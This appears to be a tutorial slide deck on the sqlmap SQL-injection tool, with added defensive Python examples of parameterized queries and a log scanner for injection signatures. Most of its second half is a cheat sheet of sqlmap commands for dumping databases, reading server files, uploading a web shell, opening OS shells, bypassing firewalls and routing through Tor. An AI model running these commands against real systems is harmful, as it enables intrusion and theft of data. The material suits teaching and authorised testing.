SQLMAP
Created By – Siddharth Wagh
An open source pentesting tool
Mostly used for web application pentesting
A Python-based tool
Exploits vulnerabilities in databases
Supports a wide range of databases
Comes pre-installed in Kali Linux
Bernardo Damele
Bernardo took over the sqlmap project originally developed by Daniele Bellucci, promoted and presented it at Black Hat Europe in 2009.
Miroslav Stampar
Miroslav got a call from the developers and joined the project in 2009. Miroslav and Bernardo released a stable version (0.8) of sqlmap in 2010.
• On Windows: Before installing sqlmap, make sure that the system has Python installed.
To install Python, visit the link and follow the steps:
https://www.python.org/downloads/
After installing Python, download sqlmap from the given link:
https://sqlmap.org/
Follow the steps and instructions from the above link.
• On Kali Linux: sqlmap comes pre-installed in Kali Linux. Just start the bash shell and type sqlmap.
• Ubuntu/other Linux distros:
https://www.ma-no.org/en/security/sqlmap-installation-and-usage-in-ubuntu-and-kali-linux
Follow the steps and instructions from the above link.
• On Mac:
https://macappstore.org/sqlmap/
Follow the steps and instructions from the above link.
SQL
Standard database programming language used for relational databases
MySQL, Oracle, Sybase, SQL Server, PostgreSQL are some examples of relational databases
DQL, DDL, DML, DCL are some types of statements used in SQL
Developed by IBM in 1970
Recognized by ANSI and ISO
SQL INJECTION
Web application vulnerability
Ranked in top 10 vulnerabilities by OWASP
Injects malicious code in database
Can read, modify, execute sensitive data from the server database
Hacker → Web API server → Victim's database
Request: http://example.com?user=007 or 1=1;--
Query: SELECT * FROM users WHERE user=007 or 1=1;--
The query returns the database containing all data
Hacker can access all data
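The flow above comes down to a request parameter being pasted into the SQL text. The following added example (not from the original slides) runs a tautology payload of the form `007 or 1=1;--` against a string-built query and against a parameterized one; the in-memory SQLite table, its rows and the function names are assumptions made for illustration.

```python
import sqlite3


def make_db():
    """Build a constructed in-memory users table (sample data, not from the slides)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user INTEGER, name TEXT, secret TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cr3t-a"), (7, "bond", "s3cr3t-b"), (9, "carol", "s3cr3t-c")],
    )
    return db


def lookup_vulnerable(db, user_param):
    # The request parameter becomes part of the SQL text, so the database
    # parses operators supplied in the parameter as part of the query.
    query = "SELECT * FROM users WHERE user=" + user_param
    return db.execute(query).fetchall()


def lookup_parameterized(db, user_param):
    # The value is bound separately from the SQL text and is only ever
    # compared as data; it cannot add an OR clause or a comment.
    return db.execute("SELECT * FROM users WHERE user=?", (user_param,)).fetchall()


def lookup_validated(db, user_param):
    # Defence in depth: reject anything that is not a plain integer id
    # before it reaches the database layer, then still bind it.
    if not (user_param.isascii() and user_param.isdigit()):
        raise ValueError("user id must be numeric")
    return lookup_parameterized(db, int(user_param))


if __name__ == "__main__":
    db = make_db()
    payload = "007 or 1=1;--"
    print("string-built :", len(lookup_vulnerable(db, payload)), "rows")
    print("parameterized:", len(lookup_parameterized(db, payload)), "rows")
    print("validated    :", lookup_validated(db, "007"))
```

The string-built lookup returns every row because `or 1=1` is true for all of them, while the bound lookup treats the whole payload as one value that matches nothing.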
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, union query-based, stacked queries and out-of-band.
• Boolean-based blind: This technique relies on sending an SQL query to the database. The query forces the application to return a boolean result (True/False), and the content within the HTTP response will change or remain the same. The result allows an attacker to decide whether the query used returns true or false, even though no data from the database are recovered.
• Time-based blind: In this technique the attacker sends a query to the server to force a delay in the execution of the queries. The response time indicates whether the result is true or false.
• Error-based: This technique forces the database to generate an error, giving the attacker information that can be used to manipulate data in the database.
• Union-based: This technique allows an attacker to extract information from the database quickly. This attack uses the SQL UNION operator. This attack allows the attacker to add a row to the existing database on the server.
• Stacked queries: In SQL a semicolon (;) is used to terminate statements. By deleting the original query and adding a new one the attacker can change data in the database. The semicolon allows the attacker to execute multiple statements against the database.
• Out-of-band: This technique mostly depends on features being enabled on the database server being used by the web application. It occurs when an attacker is unable to use the same channel to launch the attack and gather results. This technique relies on the database server's ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server's xp_dirtree command, which can be used to make DNS requests to a server an attacker controls, as well as Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.
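Seen from the defender's side, each technique above leaves a recognisable shape in web-server access logs. The following added example (not from the original slides) scans constructed combined-format log lines for five of the six techniques plus sqlmap's default User-Agent prefix; the regexes, log lines and function names are assumptions chosen for illustration, and error-based payloads are left out because their signatures are DBMS-specific.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); sample data, not real traffic.
SAMPLE_LOG = [
    '198.51.100.10 - - [10/Oct/2024:13:55:36 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "GET /page.php?id=1%20AND%204821%3D4821 HTTP/1.1" 200 512 "-" "sqlmap/1.x (https://sqlmap.org)"',
    '203.0.113.8 - - [10/Oct/2024:13:55:38 +0000] "GET /page.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Oct/2024:13:55:44 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2024:13:55:45 +0000] "GET /page.php?id=1%3B%20SELECT%20PG_SLEEP(5)-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.11 - - [10/Oct/2024:13:55:46 +0000] "GET /search.php?q=salt+and+pepper HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# One illustrative signature per technique named in the slide.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "time-based blind": re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
    "union query-based": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "stacked queries": re.compile(r";\s*(?:select|insert|update|delete|drop|exec)\b", re.I),
    "out-of-band": re.compile(r"\bxp_dirtree\b|\butl_http\b", re.I),
}


def classify(line):
    """Return (ip, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = set()
    if m.group("ua").lower().startswith("sqlmap/"):
        findings.add("sqlmap default user-agent")
    # Decode twice so double-encoded payloads are inspected as well.
    decoded = unquote_plus(unquote_plus(m.group("target")))
    for name, rx in SIGNATURES.items():
        if rx.search(decoded):
            findings.add(name)
    return m.group("ip"), findings


def scan(lines):
    """Aggregate findings per source IP; clean sources are omitted."""
    report = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            report.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(found) for ip, found in report.items()}


if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(found))
```

The last sample line shows why the boolean signature requires a numeric comparison: an ordinary search for "salt and pepper" is not flagged.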
SQLMAP supports MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB and Virtuoso database management systems.
LET'S START WITH SQLMAP
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain strings like name and pass.
• Support to download and upload any file from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server's underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
• Support for database process user privilege escalation via Metasploit's Meterpreter getsystem command.
Basic syntax: sqlmap -u URL/-r FILE --function
• GET request: sqlmap -u "http://example.com/page.php?id=1"
• Using file: sqlmap -r request.txt
• Testing with pattern of URLs: sqlmap -u "http://example.com/page*/view" --dbs
• POST request: sqlmap -u "http://example.com/login.php" --data "username=admin&password=admin&submit=submit" -p username
• Using cookies: sqlmap -u "http://example.com/enter.php" --cookie="PHPSESSID=4582s5545gfsg77854"
• Database enumeration: sqlmap -u "http://example.com/page.php?id=1" --dbs
• Identify current database: sqlmap -u "http://example.com/page.php?id=1" --current-db
• Extract tables: sqlmap -u "http://example.com/page.php?id=1" -D database --tables
• Extract columns: sqlmap -u "http://example.com/page.php?id=1" -D database -T table_name --columns
• Dumping data: sqlmap -u "http://example.com/page.php?id=1" -D database -T table_name -C column_names --dump
• Multithreading: sqlmap -u "http://example.com/page.php?id=1" --dbs --threads 5
• Null connection: sqlmap -u "http://example.com/page.php?id=1" --dbs --null-connection
• HTTP persistent connection: sqlmap -u "http://example.com/page.php?id=1" --dbs --keep-alive
• Output prediction: sqlmap -u "http://example.com/page.php?id=1" -D database -T table_name -C column_names --dump --predict-output
• Checking privileges: sqlmap -u "http://example.com/page.php?id=1" --privileges
• Reading files from the server: sqlmap -u "http://example.com/page.php?id=1" --file-read=/etc/users
• Uploading files/shell: sqlmap -u "http://example.com/page.php?id=1" --file-write=/root/shell.php --file-dest=/var/www/shell.php
• SQL shell: sqlmap -u "http://example.com/page.php?id=1" --sql-shell
• OS shell: sqlmap -u "http://example.com/page.php?id=1" --os-shell
• OS command execution without shell upload: sqlmap -u "http://example.com/page.php?id=1" --os-cmd "username-a"
• Using proxy: sqlmap --proxy="http://127.0.0.1:8080" -u "http://example.com/page.php?id=1" --dbs
• Using proxy with credentials: sqlmap --proxy="http://127.0.0.1:8080" --proxy-cred=username:password -u "http://example.com/page.php?id=1"
• Crawling: sqlmap -u "http://example.com/" --crawl=1
• Exploitation in verbose mode: sqlmap -u "http://example.com/page.php?id=1" -v 3
• Bypassing WAF (web application firewall): sqlmap -u "http://example.com/page.php?id=1" --tamper=apostrophemask
• Scanning key-based authentication page: sqlmap -u "http://example.com/page.php?id=1" --auth-file=
• To use default Tor network: sqlmap -u "http://example.com/page.php?id=1" --tor
• Scanning with high risk and level: sqlmap -u "http://example.com/page.php?id=1" --level=5 --risk=3
• Metasploit
• Acunetix
• Netsparker
• Intruder
• Beagle Security
• Appknox
• Sqlninja
• Detectify Deep Scan
• Havij
• BBQSQL
• Leviathan
• WhiteWidow
• Jsql
• Sqlmate
• Pybelt
• https://sqlmap.org/
• http://testphp.vulnweb.com/listproducts.php?cat=1
• https://owasp.org/
• https://www.g2.com/products/sqlmap/competitors/alternatives
• http://example.com/page.php?id=1